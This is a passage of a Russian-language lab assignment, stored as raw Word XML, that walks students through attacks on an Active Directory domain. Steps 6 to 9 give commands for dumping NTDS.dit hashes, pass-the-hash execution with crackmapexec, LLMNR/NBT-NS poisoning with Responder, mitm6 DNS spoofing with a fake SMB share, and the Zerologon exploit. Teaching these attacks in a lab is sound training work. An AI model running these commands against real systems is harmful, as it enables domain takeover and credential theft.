            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:hyperlink r:id="rId13" w:tooltip="https://blog.eldernode.com/install-and-use-impacket-on-kali-linux/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.eldernode.com/install-and-use-impacket-on-kali-linux/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256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6.4. выполнить извлечение учётных записей из скопированных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708" w:firstLine="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256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файлов: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1133" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto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mpacket-secretdump -ntds /home/kali/temp/Active\ Directory/ntds.dit -system /home/kali/registry/SYSTEM LOCAL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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256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Найди NTLM-хеши административных учётных записей;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1133" w:hanging="425"/>
        <w:spacing w:after="160" w:line="256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6.5. произвести удалённое выполнение команд с использованием найденных хешей. Выполнить команды в Kali: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1133" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto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crackmapexec smb &lt;IP-адрес контроллера домена&gt; -u &lt;имя учётной записи&gt; -H &lt;NTLM-хеш&gt; -x &lt;произвольная команда CMD Windows&gt;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ind w:left="1133" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="256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Убедиться, что команда успешно выполнена. Выполнить аналогичные действия для Windows 10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделать скриншоты выполненных команд, включить скриншоты в отчёт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0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow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7. Выполнить отравление кеша LLMNR и NBT-NS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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7.1. войти в Kali Linux. Пройти аутентификацию, если необходимо.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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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Выполнить запуск responder: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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Responder – I eth0 -wFv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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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В случае необходимости повысить привилегии для выполнения команды. Убедиться в том, что responder функционирует;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1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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7.2. войти в Windows 10 под любой доменной учётной записью. В командной строке ввести любое несуществующее NBT имя, имитируя ошибку пользователя (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\\DC5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). В случае запроса учётных данных, ввести их в окно;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1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256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7.3. вернуться в Kali Linux, в окно responder. Убедиться в перехвате учётных данных аутентификации. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделать скриншот перехваченных данных, включить в отчёт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0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow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8. Выполнить встраивание поддельного сервера DNS IPv6 и поддельного SMB-ресурса:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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8.1. в случае необходимости выполнить установку пакета mitm6. Открыть терминал в Kali Linux и выполнить команду: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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pip install mitm6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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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дождаться установки пакета;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1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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8.2. запустить процесс DHCPv6 и подстановки DNS-сервера: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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mitm6 -d &lt;имя домена&gt;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ind w:left="1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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8.3. убедиться, что в Windows 10 используется поддельный DNS-сервер. В Windows 10 выполнить команду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ipconfig /all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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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Сделать скриншот с указанием ложного сервера DNS. Добавить скриншот в отчёт;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1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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8.4. создать поддельный SMB-ресурс для компрометации учётных данных. В Kali в терминале ввести команду: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1080" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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Impacket-smbserver -smb2support Share /root/kali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ind w:left="1133" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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8.5. в Windows 10 под любой учётной записью ввести в строке Explorer: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\\&lt;имя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 домена&gt;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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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Убедиться, что созданный общий ресурс доступен вместо общего ресурса контроллера домена. Попытаться открыть общий ресурс;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1133" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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8.6. вернуться в Kali Linux. Убедиться, что в терминале перехвачены учётные данные. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделать скриншот терминала, вставить в отчёт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0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow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9. Выполнить атаку Zerologon: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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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9.1. выполнить установку эксплойта Zerologon. На Kali Linux выполнить команду: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single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Git clone</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="https://github.com/risksense/zerologon" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:hyperlink r:id="rId15" w:tooltip="https://github.com/risksense/zerologon" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
            <w:b/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/risksense/zerologon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:color w:val="0563c1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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Убедиться, что установка прошла успешно.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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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Cd ./zerologon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 (путь может отличаться);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1133" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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9.2. запустить эксплойт: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256" w:lineRule="auto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python3 set_empty_pw.py &lt;имя контроллера домена&gt; &lt;IP-адрес контроллера домена&gt;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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="256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Дождаться выполнения команды;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1133" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256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9.3. выполнить замену хеша контроллера домена. Выполнить команду из файла readme, используя </w:t>
      </w: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impacket-secretdump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, установленный в п.6.3.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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i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Дождаться результата выполнения команды. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделать скриншот, вставить скриншот в отчёт.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:spacing w:before="120" w:after="120"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tl w:val="0"/>
        </w:rPr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keepLines/>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="259" w:lineRule="auto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Подготовка отчёта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keepLines/>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="12" w:name="_heading=h.ltqrayzru4c"/>
      <w:r/>
      <w:bookmarkEnd w:id="12"/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По результатам выполнения работы необходимо подготовить отчёт. Отчёт должен включать скриншоты выполненных заданий: пункты 1.8, 2.4, 3.2, 4.2, 5.5, 6.5, 7.3, 8.6, 9.3). Отчёт оформляется в свободной форме.</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11909" w:h="16834" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1417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Proxima Nova"/>
  <w:font w:name="Symbol">
    <w:panose1 w:val="05010000000000000000"/>
  </w:font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08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40" w:hanging="180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7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none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-RU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86">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="855"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="687">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="856"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="688">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="857"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="689">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="858"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="690">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="859"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="691">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="860"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="692">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:link w:val="69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3">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="69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94">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:link w:val="69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5">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="694"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="696">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:link w:val="69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7">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="696"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="698">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="699">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="873"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="700">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="880"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="701">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:link w:val="702"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="702">
    <w:name w:val="Quote Char"/>
    <w:link w:val="701"/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="703">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:link w:val="70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4">
    <w:name w:val="Intense Quote Char"/>
    <w:link w:val="703"/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="705">
    <w:name w:val="Header"/>
    <w:basedOn w:val="862"/>
    <w:link w:val="70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6">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="705"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="707">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="862"/>
    <w:link w:val="71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8">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="869"/>
    <w:link w:val="707"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="709">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="86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0">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="709"/>
    <w:link w:val="707"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="table" w:styleId="711">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="87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2">
    <w:name w:val="Table Grid Light"/>
    <w:basedOn w:val="87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3">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="87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4">
    <w:name w:val="Plain Table 2"/>
    <w:basedOn w:val="87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5">
    <w:name w:val="Plain Table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6">
    <w:name w:val="Plain Table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Plain Table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8">
    <w:name w:val="Grid Table 1 Light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4"/>
    <w:basedOn w:val="8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0">
    <w:name w:val="Grid Table 4 - Accent 1"/>
    <w:basedOn w:val="8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1">
    <w:name w:val="Grid Table 4 - Accent 2"/>
    <w:basedOn w:val="8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2">
    <w:name w:val="Grid Table 4 - Accent 3"/>
    <w:basedOn w:val="8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3">
    <w:name w:val="Grid Table 4 - Accent 4"/>
    <w:basedOn w:val="8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4">
    <w:name w:val="Grid Table 4 - Accent 5"/>
    <w:basedOn w:val="8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5">
    <w:name w:val="Grid Table 4 - Accent 6"/>
    <w:basedOn w:val="8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6">
    <w:name w:val="Grid Table 5 Dark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7">
    <w:name w:val="Grid Table 5 Dark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50">
    <w:name w:val="Grid Table 5 Dark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51">
    <w:name w:val="Grid Table 5 Dark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52">
    <w:name w:val="Grid Table 5 Dark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53">
    <w:name w:val="Grid Table 6 Colorful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4">
    <w:name w:val="Grid Table 6 Colorful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5">
    <w:name w:val="Grid Table 6 Colorful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6">
    <w:name w:val="Grid Table 6 Colorful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7">
    <w:name w:val="Grid Table 6 Colorful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8">
    <w:name w:val="Grid Table 6 Colorful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9">
    <w:name w:val="Grid Table 6 Colorful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0">
    <w:name w:val="Grid Table 7 Colorful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5">
    <w:name w:val="List Table 2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6">
    <w:name w:val="List Table 2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7">
    <w:name w:val="List Table 2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8">
    <w:name w:val="List Table 2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9">
    <w:name w:val="List Table 2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0">
    <w:name w:val="List Table 2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1">
    <w:name w:val="List Table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5 Dark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6 Colorful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3">
    <w:name w:val="List Table 6 Colorful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4">
    <w:name w:val="List Table 6 Colorful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5">
    <w:name w:val="List Table 6 Colorful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6">
    <w:name w:val="List Table 6 Colorful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7">
    <w:name w:val="List Table 6 Colorful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8">
    <w:name w:val="List Table 6 Colorful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9">
    <w:name w:val="List Table 7 Colorful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0">
    <w:name w:val="List Table 7 Colorful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11">
    <w:name w:val="List Table 7 Colorful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12">
    <w:name w:val="List Table 7 Colorful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13">
    <w:name w:val="List Table 7 Colorful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14">
    <w:name w:val="List Table 7 Colorful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15">
    <w:name w:val="List Table 7 Colorful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16">
    <w:name w:val="Lined - Accent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7">
    <w:name w:val="Lined - Accent 1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8">
    <w:name w:val="Lined - Accent 2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9">
    <w:name w:val="Lined - Accent 3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0">
    <w:name w:val="Lined - Accent 4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1">
    <w:name w:val="Lined - Accent 5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2">
    <w:name w:val="Lined - Accent 6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3">
    <w:name w:val="Bordered &amp; Lined - Accent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4">
    <w:name w:val="Bordered &amp; Lined - Accent 1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5">
    <w:name w:val="Bordered &amp; Lined - Accent 2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6">
    <w:name w:val="Bordered &amp; Lined - Accent 3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7">
    <w:name w:val="Bordered &amp; Lined - Accent 4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8">
    <w:name w:val="Bordered &amp; Lined - Accent 5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9">
    <w:name w:val="Bordered &amp; Lined - Accent 6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0">
    <w:name w:val="Bordered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1">
    <w:name w:val="Bordered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2">
    <w:name w:val="Bordered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3">
    <w:name w:val="Bordered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4">
    <w:name w:val="Bordered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5">
    <w:name w:val="Bordered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6">
    <w:name w:val="Bordered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37">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="862"/>
    <w:link w:val="838"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="838">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="837"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="839">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="869"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="840">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="862"/>
    <w:link w:val="841"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="841">
    <w:name w:val="Endnote Text Char"/>
    <w:link w:val="840"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="842">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="869"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="843">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="844">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="862"/>
    <w:next w:val="862"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
